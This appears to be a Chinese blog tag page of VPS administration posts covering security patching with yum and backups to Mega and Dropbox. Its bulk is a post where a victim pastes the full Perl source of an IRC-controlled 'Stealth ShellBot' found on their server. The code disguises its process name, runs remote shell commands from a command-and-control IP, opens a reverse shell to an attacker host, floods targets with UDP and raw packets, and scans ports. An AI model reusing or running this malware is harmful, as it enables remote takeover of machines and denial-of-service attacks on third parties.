标签 VPS 下的文章
Linux - centos/rhel 更新安全补丁
centos如果直接update,会升级整个系统的包,系统升级到新的版本,导致有些没有经过测试的程序异常,所以为了安全,会只更新安全补丁,而不去升级系统版本。
centos 系统加固
1.首先要先安装安装yum插件:
yum install yum-security -y
2.使用:检查安全更新
yum --security check-update
3.只安装安全更新
yum update --security
检查特定软件有无安全更新
列出更新的详细信息
yum info-security software_name
来自Linux - centos/rhel 更新安全补丁
VPS被扫了一脸,贴恶意代码
#!/usr/bin/perl
# - Adicionado comando !estatisticas ;
# - Alterado o comando @pacota para @oldpack;
# - Adicionado dois novos pacotadores: @udp e @udpfaixa ;
# - Adicionado um novo portscan -> @fullportscan ;
# - Adicionado comando @conback com suporte para Windows/Unix :D;
# - Adicionado comando: !sair para finalizar o bot;
# - Adicionado comando: !novonick para trocar o nick do bot por um novo aleatorio;
# - Adicionado comando !entra e !sai ;
# - Adicionado comando @download ;
# - Adicionado comando !pacotes para ativar/desativar pacotes :);
########## CONFIGURACAO ############
my $processo = '/usr/local/apache/bin/httpd -DSSL';
$servidor='104.160.176.116' unless $servidor;
my $porta='80';
my @canais=("#god");
my @adms=("god","laris");
my @auth=("*!*@max");
# Anti Flood ( 6/3 Recomendado )
my $linas_max=6;
my $sleep=3;
my $nick = getnick();
my $ircname = getnick();
my $realname = getnick();
my $acessoshell = 1;
######## Stealth ShellBot ##########
my $prefixo = "#";
my $estatisticas = 0;
my $pacotes = 1;
####################################
my $VERSAO = '0.2a';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0";
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);
my %irc_servers;
my %DCC;
my $dcc_sel = new IO::Select->new();
#####################
# Stealth Shellbot #
#####################
sub getnick {
#my $retornonick = &_get("http://websurvey.burstmedia.com/names.txt");
#return $retornonick;
return "new".int(rand(9000));
}
sub getident {
my $retornoident = &_get("http://www.minpop.com/sk12pack/idents.php");
my $identchance = int(rand(1000));
if ($identchance > 30) {
return $nick;
} else {
return $retornoident;
}
return $retornoident;
}
sub getname {
my $retornoname = &_get("http://www.minpop.com/sk12pack/names.php");
return $retornoname;
}
# IDENT TEMPORARIA - Pegar ident da url ta bugando o_o
sub getident2 {
my $length=shift;
$length = 3 if ($length < 3);
my @chars=('a'..'z','A'..'Z','1'..'9');
foreach (1..$length)
{
$randomstring.=$chars[rand @chars];
}
return $randomstring;
}
sub getstore ($$)
{
my $url = shift;
my $file = shift;
$http_stream_out = 1;
open(GET_OUTFILE, "> $file");
%http_loop_check = ();
_get($url);
close GET_OUTFILE;
return $main::http_get_result;
}
sub _get
{
my $url = shift;
my $proxy = "";
grep {(lc($_) eq "http_proxy") && ($proxy = $ENV{$_})} keys %ENV;
if (($proxy eq "") && $url =~ m,^http://([^/:]+)(?::(\d+))?(/\S*)?$,) {
my $host = $1;
my $port = $2 || 80;
my $path = $3;
$path = "/" unless defined($path);
return _trivial_http_get($host, $port, $path);
} elsif ($proxy =~ m,^http://([^/:]+):(\d+)(/\S*)?$,) {
my $host = $1;
my $port = $2;
my $path = $url;
return _trivial_http_get($host, $port, $path);
} else {
return undef;
}
}
sub _trivial_http_get
{
my($host, $port, $path) = @_;
my($AGENT, $VERSION, $p);
#print "HOST=$host, PORT=$port, PATH=$path\n";
$AGENT = "get-minimal";
$VERSION = "20000118";
$path =~ s/ /%20/g;
require IO::Socket;
local($^W) = 0;
my $sock = IO::Socket::INET->new(PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp',
Timeout => 60) || return;
$sock->autoflush;
my $netloc = $host;
$netloc .= ":$port" if $port != 80;
my $request = "GET $path HTTP/1.0\015\012"
. "Host: $netloc\015\012"
. "User-Agent: $AGENT/$VERSION/u\015\012";
$request .= "Pragma: no-cache\015\012" if ($main::http_no_cache);
$request .= "\015\012";
print $sock $request;
my $buf = "";
my $n;
my $b1 = "";
while ($n = sysread($sock, $buf, 8*1024, length($buf))) {
if ($b1 eq "") { # first block?
$b1 = $buf; # Save this for errorcode parsing
$buf =~ s/.+?\015?\012\015?\012//s; # zap header
}
if ($http_stream_out) { print GET_OUTFILE $buf; $buf = ""; }
}
return undef unless defined($n);
$main::http_get_result = 200;
if ($b1 =~ m,^HTTP/\d+\.\d+\s+(\d+)[^\012]*\012,) {
$main::http_get_result = $1;
# print "CODE=$main::http_get_result\n$b1\n";
if ($main::http_get_result =~ /^30[1237]/ && $b1 =~ /\012Location:\s*(\S+)/
) {
# redirect
my $url = $1;
return undef if $http_loop_check{$url}++;
return _get($url);
}
return undef unless $main::http_get_result =~ /^2/;
}
return $buf;
}
#############################
# B0tchZ na veia ehehe :P #
#############################
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]\n";
} else {
print $IRC_cur_socket "$_[0]\n";
}
}
sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 2;
}
}
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
&DCC::connections;
my @ready = $sel_cliente->can_read(0.6);
next unless(@ready);
foreach $fh (@ready) {
$IRC_cur_socket = $fh;
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
$nread = sysread($fh, $msg, 4096);
if ($nread == 0) {
$sel_cliente->remove($fh);
$fh->close;
delete($irc_servers{$fh});
}
@lines = split (/\n/, $msg);
for(my $c=0; $c<= $#lines; $c++) {
$line = $lines[$c];
$line=$line_temp.$line if ($line_temp);
$line_temp='';
$line =~ s/\r$//;
unless ($c == $#lines) {
parse("$line");
} else {
if ($#lines == 0) {
parse("$line");
} elsif ($lines[$c] =~ /\r$/) {
parse("$line");
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
parse("$line");
} else {
$line_temp = $line;
}
}
}
}
}
sub parse {
my $servarg = shift;
if ($servarg =~ /^PING \:(.*)/) {
sendraw("PONG :$1");
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
my $pn=$1; my $onde = $4; my $args = $5;
if ($args =~ /^\001VERSION\001$/) {
notice("$pn", "\001VERSION mIRC v6.16 ENE ALIN GABRIEL\001");
}
elsif ($args =~ /^\001PING\s+(\d+)\001$/) {
notice("$pn", "\001PONG\001");
}
elsif (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
if ($onde eq "$meunick"){
shell("$pn", "$args");
}
elsif ($args =~ /^(\Q$meunick\E|\Q$prefixo\E)\s+(.*)/ ) {
my $natrix = $1;
my $arg = $2;
if ($arg =~ /^\!(.*)/) {
ircase("$pn","$onde","$1") unless ($natrix eq "$prefixo" and $arg =~ /^\!nick/);
} elsif ($arg =~ /^\@(.*)/) {
$ondep = $onde;
$ondep = $pn if $onde eq $meunick;
bfunc("$ondep","$1");
} else {
shell("$onde", "$arg");
}
}
}
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
$meunick=$4;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
$meunick = getnick();
nick("$meunick");
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
sendraw("JOIN $canal");
}
}
}
sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my @portas=("21","22","23","25","53","80","110","143");
my (@aberta, %porta_banner);
foreach my $porta (@portas) {
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@aberta, $porta);
$scansock->close;
}
}
if (@aberta) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :Portas abertas: @aberta");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada.");
}
}
elsif ($funcarg =~ /^download\s+(.*)\s+(.*)/) {
getstore("$1", "$2");
sendraw($IRC_cur_socket, "PRIVMSG $printl :Download de $2 ($1) Conclu.do!") if ($estatisticas);
}
elsif ($funcarg =~ /^fullportscan\s+(.*)\s+(\d+)\s+(\d+)/) {
my $hostname="$1";
my $portainicial = "$2";
my $portafinal = "$3";
my (@abertas, %porta_banner);
foreach my $porta ($portainicial..$portafinal)
{
my $scansock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
if ($scansock) {
push (@abertas, $porta);
$scansock->close;
if ($estatisticas) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :Porta $porta aberta em $hostname");
}
}
}
if (@abertas) {
sendraw($IRC_cur_socket, "PRIVMSG $printl :Portas abertas: @abertas");
} else {
sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada.");
}
}
# Duas Vers.es simplificada do meu Tr0x ;D
elsif ($funcarg =~ /^udp\s+(.*)\s+(\d+)\s+(\d+)/) {
return unless $pacotes;
socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
my $alvo=inet_aton("$1");
my $porta = "$2";
my $tempo = "$3";
my $pacote;
my $pacotese;
my $fim = time + $tempo;
my $pacota = 1;
while (($pacota == "1") && ($pacotes == "1")) {
$pacota = 0 if ((time >= $fim) && ($tempo != "0"));
$pacote=$rand x $rand x $rand;
$porta = int(rand 65000) +1 if ($porta == "0");
send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
}
if ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo de Pacotes\002: $tempo"."s");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total de Pacotes\002: $pacotese");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Alvo dos Pacotes\002: $1");
}
}
elsif ($funcarg =~ /^udpfaixa\s+(.*)\s+(\d+)\s+(\d+)/) {
return unless $pacotes;
socket(Tr0x, PF_INET, SOCK_DGRAM, 17);
my $faixaip="$1";
my $porta = "$2";
my $tempo = "$3";
my $pacote;
my $pacotes;
my $fim = time + $tempo;
my $pacota = 1;
my $alvo;
while ($pacota == "1") {
$pacota = 0 if ((time >= $fim) && ($tempo != "0"));
for (my $faixa = 1; $faixa <= 255; $faixa++) {
$alvo = inet_aton("$faixaip.$faixa");
$pacote=$rand x $rand x $rand;
$porta = int(rand 65000) +1 if ($porta == "0");
send(Tr0x, 0, $pacote, sockaddr_in($porta, $alvo)) and $pacotese++ if ($pacotes == "1");
if ($faixa >= 255) {
$faixa = 1;
}
}
}
if ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo de Pacotes\002: $tempo"."s");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total de Pacotes\002: $pacotese");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Alvo dos Pacotes\002: $alvo");
}
}
# Conback.pl by Dominus Vis adaptada e adicionado suporte pra windows ;p
elsif ($funcarg =~ /^conback\s+(.*)\s+(\d+)/) {
my $host = "$1";
my $porta = "$2";
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($porta, $iaddr);
my $shell = "/bin/sh -i";
if ($^O eq "MSWin32") {
$shell = "cmd.exe";
}
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
connect(SOCKET, $paddr) or die "connect: $!";
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system("$shell");
close(STDIN);
close(STDOUT);
close(STDERR);
if ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Conectando-se em\002: $host:$porta");
}
}
elsif ($funcarg =~ /^oldpack\s+(.*)\s+(\d+)\s+(\d+)/) {
return unless $pacotes;
my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
$dtime = 1 if $dtime == 0;
my %bytes;
$bytes{igmp} = $2 * $pacotes{igmp};
$bytes{icmp} = $2 * $pacotes{icmp};
$bytes{o} = $2 * $pacotes{o};
$bytes{udp} = $2 * $pacotes{udp};
$bytes{tcp} = $2 * $pacotes{tcp};
unless ($estatisticas)
{
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002 - Status -\002");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Timp\002: $dtime"."secunde.");
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total packet\002: ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} + $pacotes{o}));
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total bytes\002: ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Flood\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
}
}
exit;
}
}
}
sub ircase {
my ($kem, $printl, $case) = @_;
if ($case =~ /^join (.*)/) {
j("$1");
}
elsif ($case =~ /^part (.*)/) {
p("$1");
}
elsif ($case =~ /^rejoin\s+(.*)/) {
my $chan = $1;
if ($chan =~ /^(\d+) (.*)/) {
for (my $ca = 1; $ca <= $1; $ca++ ) {
p("$2");
j("$2");
}
} else {
p("$chan");
j("$chan");
}
}
elsif ($case =~ /^op/) {
op("$printl", "$kem") if $case eq "op";
my $oarg = substr($case, 3);
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^deop/) {
deop("$printl", "$kem") if $case eq "deop";
my $oarg = substr($case, 5);
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^voice/) {
voice("$printl", "$kem") if $case eq "voice";
$oarg = substr($case, 6);
voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^devoice/) {
devoice("$printl", "$kem") if $case eq "devoice";
$oarg = substr($case, 8);
devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
}
elsif ($case =~ /^msg\s+(\S+) (.*)/) {
msg("$1", "$2");
}
elsif ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
msg("$2", "$3");
}
}
elsif ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
for (my $cf = 1; $cf <= $1; $cf++) {
ctcp("$2", "$3");
}
}
elsif ($case =~ /^ctcp\s+(\S+) (.*)/) {
ctcp("$1", "$2");
}
elsif ($case =~ /^invite\s+(\S+) (.*)/) {
invite("$1", "$2");
}
elsif ($case =~ /^nick (.*)/) {
nick("$1");
}
elsif ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
conectar("$2", "$1", 6667);
}
elsif ($case =~ /^send\s+(\S+)\s+(\S+)/) {
DCC::SEND("$1", "$2");
}
elsif ($case =~ /^raw (.*)/) {
sendraw("$1");
}
elsif ($case =~ /^eval (.*)/) {
eval "$1";
}
elsif ($case =~ /^entra\s+(\S+)\s+(\d+)/) {
sleep int(rand($2));
j("$1");
}
elsif ($case =~ /^sai\s+(\S+)\s+(\d+)/) {
sleep int(rand($2));
p("$1");
}
elsif ($case =~ /^sair/) {
quit();
}
elsif ($case =~ /^novonick/) {
my $novonick = getnick();
nick("$novonick");
}
elsif ($case =~ /^estatisticas (.*)/) {
if ($1 eq "on") {
$estatisticas = 1;
msg("$printl", "Estat.sticas ativadas!");
} elsif ($1 eq "off") {
$estatisticas = 0;
msg("$printl", "Estat.sticas desativadas!");
}
}
elsif ($case =~ /^pacotes (.*)/) {
if ($1 eq "on") {
$pacotes = 1;
msg("$printl", "Pacotes ativados!") if ($estatisticas == "1");
} elsif ($1 eq "off") {
$pacotes = 0;
msg("$printl", "Pacotes desativados!") if ($estatisticas == "1");
}
}
}
sub shell {
return unless $acessoshell;
my $printl=$_[0];
my $comando=$_[1];
if ($comando =~ /cd (.*)/) {
chdir("$1") || msg("$printl", "Diret.rio inexistente!");
return;
}
elsif ($pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
exit;
} else {
my @resp=`$comando 2>&1 3>&1`;
my $c=0;
foreach my $linha (@resp) {
$c++;
chop $linha;
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
if ($c >= "$linas_max") {
$c=0;
sleep $sleep;
}
}
exit;
}
}
}
#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
sub attacker {
my $iaddr = inet_aton($_[0]);
my $msg = 'B' x $_[1];
my $ftime = $_[2];
my $cp = 0;
my (%pacotes);
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
return(undef) if $cp == 4;
my $itime = time;
my ($cur_time);
while ( 1 ) {
for (my $porta = 1; $porta <= 65535; $porta++) {
$cur_time = time - $itime;
last if $cur_time >= $ftime;
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++ if ($pacotes == 1);
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++ if ($pacotes == 1);
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++ if ($pacotes == 1);
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++ if ($pacotes == 1);
# DoS ?? :P
for (my $pc = 3; $pc <= 255;$pc++) {
next if $pc == 6;
$cur_time = time - $itime;
last if $cur_time >= $ftime;
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++ if ($pacotes == 1);
}
}
last if $cur_time >= $ftime;
}
return($cur_time, %pacotes);
}
#############
# ALIASES #
#############
sub action {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
}
sub ctcp {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
return unless $#_ == 1;
sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
return unless $#_ == 1;
sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
return unless $#_ == 1;
sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
return unless $#_ == 1;
sendraw("MODE $_[0] -o $_[1]");
}
sub hop {
return unless $#_ == 1;
sendraw("MODE $_[0] +h $_[1]");
}
sub dehop {
return unless $#_ == 1;
sendraw("MODE $_[0] +h $_[1]");
}
sub voice {
return unless $#_ == 1;
sendraw("MODE $_[0] +v $_[1]");
}
sub devoice {
return unless $#_ == 1;
sendraw("MODE $_[0] -v $_[1]");
}
sub ban {
return unless $#_ == 1;
sendraw("MODE $_[0] +b $_[1]");
}
sub unban {
return unless $#_ == 1;
sendraw("MODE $_[0] -b $_[1]");
}
sub kick {
return unless $#_ == 1;
sendraw("KICK $_[0] $_[1] :$_[2]");
}
sub modo {
return unless $#_ == 0;
sendraw("MODE $_[0] $_[1]");
}
sub mode { modo(@_); }
sub j { &join(@_); }
sub join {
return unless $#_ == 0;
sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {sendraw("PART $_[0]");}
sub nick {
return unless $#_ == 0;
sendraw("NICK $_[0]");
}
sub invite {
return unless $#_ == 1;
sendraw("INVITE $_[1] $_[0]");
}
sub topico {
return unless $#_ == 1;
sendraw("TOPIC $_[0] $_[1]");
}
sub topic { topico(@_); }
sub whois {
return unless $#_ == 0;
sendraw("WHOIS $_[0]");
}
sub who {
return unless $#_ == 0;
sendraw("WHO $_[0]");
}
sub names {
return unless $#_ == 0;
sendraw("NAMES $_[0]");
}
sub away {
sendraw("AWAY $_[0]");
}
sub back { away(); }
sub quit {
sendraw("QUIT :$_[0]");
exit;
}
# DCC
package DCC;
sub connections {
my @ready = $dcc_sel->can_read(1);
# return unless (@ready);
foreach my $fh (@ready) {
my $dcctipo = $DCC{$fh}{tipo};
my $arquivo = $DCC{$fh}{arquivo};
my $bytes = $DCC{$fh}{bytes};
my $cur_byte = $DCC{$fh}{curbyte};
my $nick = $DCC{$fh}{nick};
my $msg;
my $nread = sysread($fh, $msg, 10240);
if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
$DCC{$fh}{status} = "Cancelado";
$DCC{$fh}{ftime} = time;
$dcc_sel->remove($fh);
$fh->close;
next;
}
if ($dcctipo eq "get") {
$DCC{$fh}{curbyte} += length($msg);
my $cur_byte = $DCC{$fh}{curbyte};
open(FILE, ">> $arquivo");
print FILE "$msg" if ($cur_byte <= $bytes);
close(FILE);
my $packbyte = pack("N", $cur_byte);
print $fh "$packbyte";
if ($bytes == $cur_byte) {
$dcc_sel->remove($fh);
$fh->close;
$DCC{$fh}{status} = "Recebido";
$DCC{$fh}{ftime} = time;
next;
}
} elsif ($dcctipo eq "send") {
my $send = $fh->accept;
$send->autoflush(1);
$dcc_sel->add($send);
$dcc_sel->remove($fh);
$DCC{$send}{tipo} = 'sendcon';
$DCC{$send}{itime} = time;
$DCC{$send}{nick} = $nick;
$DCC{$send}{bytes} = $bytes;
$DCC{$send}{curbyte} = 0;
$DCC{$send}{arquivo} = $arquivo;
$DCC{$send}{ip} = $send->peerhost;
$DCC{$send}{porta} = $send->peerport;
$DCC{$send}{status} = "Enviando";
#de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
open(FILE, "< $arquivo");
my $fbytes;
read(FILE, $fbytes, 1024);
print $send "$fbytes";
close FILE;
# delete($DCC{$fh});
} elsif ($dcctipo eq 'sendcon') {
my $bytes_sended = unpack("N", $msg);
$DCC{$fh}{curbyte} = $bytes_sended;
if ($bytes_sended == $bytes) {
$fh->close;
$dcc_sel->remove($fh);
$DCC{$fh}{status} = "Enviado";
$DCC{$fh}{ftime} = time;
next;
}
open(SENDFILE, "< $arquivo");
seek(SENDFILE, $bytes_sended, 0);
my $send_bytes;
read(SENDFILE, $send_bytes, 1024);
print $fh "$send_bytes";
close(SENDFILE);
}
}
}
sub SEND {
my ($nick, $arquivo) = @_;
unless (-r "$arquivo") {
return(0);
}
my $dccark = $arquivo;
$dccark =~ s/[.*\/](\S+)/$1/;
my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
my $longip = unpack("N",inet_aton($meuip));
my @filestat = stat($arquivo);
my $size_total=$filestat[7];
if ($size_total == 0) {
return(0);
}
my ($porta, $sendsock);
do {
$porta = int rand(64511);
$porta += 1024;
$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
} until $sendsock;
$DCC{$sendsock}{tipo} = 'send';
$DCC{$sendsock}{nick} = $nick;
$DCC{$sendsock}{bytes} = $size_total;
$DCC{$sendsock}{arquivo} = $arquivo;
&::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
}
sub GET {
my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
return(0) if (-e "$arquivo");
if (open(FILE, "> $arquivo")) {
close FILE;
} else {
return(0);
}
my $dccip=fixaddr($dcclongip);
return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
$dccsock->autoflush(1);
$dcc_sel->add($dccsock);
$DCC{$dccsock}{tipo} = 'get';
$DCC{$dccsock}{itime} = time;
$DCC{$dccsock}{nick} = $nick;
$DCC{$dccsock}{bytes} = $bytes;
$DCC{$dccsock}{curbyte} = 0;
$DCC{$dccsock}{arquivo} = $arquivo;
$DCC{$dccsock}{ip} = $dccip;
$DCC{$dccsock}{porta} = $dccporta;
$DCC{$dccsock}{status} = "Recebendo";
}
# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
sub Status {
my $socket = shift;
my $sock_tipo = $DCC{$socket}{tipo};
unless (lc($sock_tipo) eq "chat") {
my $nick = $DCC{$socket}{nick};
my $arquivo = $DCC{$socket}{arquivo};
my $itime = $DCC{$socket}{itime};
my $ftime = time;
my $status = $DCC{$socket}{status};
$ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
my $d_time = $ftime-$itime;
my $cur_byte = $DCC{$socket}{curbyte};
my $bytes_total = $DCC{$socket}{bytes};
my $rate = 0;
$rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
my $porcen = ($cur_byte*100)/$bytes_total;
my ($r_duv, $p_duv);
if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
$r_duv = $3; $r_duv++ if $4 >= 5;
$rate = "$1\.$2"."$r_duv";
}
if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
$p_duv = $3; $p_duv++ if $4 >= 5;
$porcen = "$1\.$2"."$p_duv";
}
return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
}
return(0);
}
# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
sub fixaddr {
my ($address) = @_;
chomp $address; # just in case, sigh.
if ($address =~ /^\d+$/) {
return inet_ntoa(pack "N", $address);
} elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
return $address;
} elsif ($address =~ tr/a-zA-Z//) { # Whee! Obfuscation!
return inet_ntoa(((gethostbyname($address))[4])[0]);
} else {
return;
}
}VPS被扫
VPS使用Megatools
原本想說要用Dropbox 來備份,但是卻找不到可以單獨設定同步其中一個目錄的設定,後來想到mega有免費50G可以使用,備份使用者文件或是一周的資料庫備份檔案都夠用了。
官方網站: http://megatools.megous.com/
https://github.com/megous/megatools
以Centos为例,安裝方法
yum -y install gcc make glib2-devel libcurl-devel openssl-devel gmp-devel tar
wget http://megatools.megous.com/builds/megatools-1.9.95.tar.gz
tar -xzvf megatools-1.9.95.tar.gz
./configure
make
make install
make clean
在使用者要同步的跟目錄建立 .megarc 檔案,內容如下
[Login]
Username = Mega的帳號
Password = Mega的密碼
接下來有很多功能可以試試看
megadl 從 mega下載檔案
megals 列出 mega 遠端目錄清單
megaput 傳送檔案到 mega
megaget 下載檔案到 mega
我最想要使用的就是同步 -r 代表遠端目錄 -l 代表本地端目錄
/usr/local/bin/megacopy -r /Root -l /backup
這樣就可以自動雙向同步檔案到mega空間了
相关
http://pkgs.org/download/megatools
Installing megatools Package on 14.04
https://megatools.megous.com/builds/
installing up-to-date glib
CentOS下升级Glib
CENTOS 6.7 - configure: error: Glib 2.32.0 or later is required to build megatools
[转载]不怕丢数据!VPS定时自动备份终极指南
网上关于rsync的资料也不少,但多数我想会把你看晕的,以下我用实例来讲解,重点的地方我会详细说明,希望让大家都会用。
以下,假设网站所在的VPS为A,存储备份的VPS为B,系统均为 CentOS备份方法为 B 定时向 A 拉数据来备份
Linux封锁Email端口,防止滥发邮件
滥发邮件一直是个很困扰的问题。
Virtualmin/Webmin:强大的VPS服务器和虚拟主机管理系统
此内容被密码保护
在搬瓦工 VPS 上搭建 Hexo
定时备份VPS数据至Dropbox教程(三篇)
(一)转载:定时备份VPS数据至Dropbox教程
之前介绍了Debian vps上使用axel多线程下载百度网盘资源,对应的是想介绍下如何将VPS上的数据上传至百度网盘上。不过百度网盘现在貌似关闭了PCS的API接口申请,使用起来比较麻烦。退而求其次,这里介绍下如何定时备份VPS数据至Dropbox中。
客户端法备份数据
1、安装及配置dropbox linux客户端
在VPS上安装linux命令行版本的dropbox:
32-bit:
cd ~ && wget -O - "https://www.dropbox.com/download?plat=lnx.x86" | tar xzf -
64-bit:
cd ~ && wget -O - "https://www.dropbox.com/download?plat=lnx.x86_64" | tar xzf -
下载完成之后,运行dropbox
~/.dropbox-dist/dropboxd
第一次运行该命令,会提示访问URL,通过访问该URL就可以绑定VPS与dropbox账号。此时查看命令行,会提示绑定成功。
绑定之后,root目录下会自动创建名为Dropbox的文件夹,Dropbox会自动同步该文件夹内的文件。
2、使用dropbox linux客户端同步vps数据
我们一般备份网站数据及数据库数据,正常情况下网站WEB目录不在root文件夹下,我们可以通过软连接指向网站WEB目录,而数据库数据可以通过命令行导出,并通过软连接指向该文件。
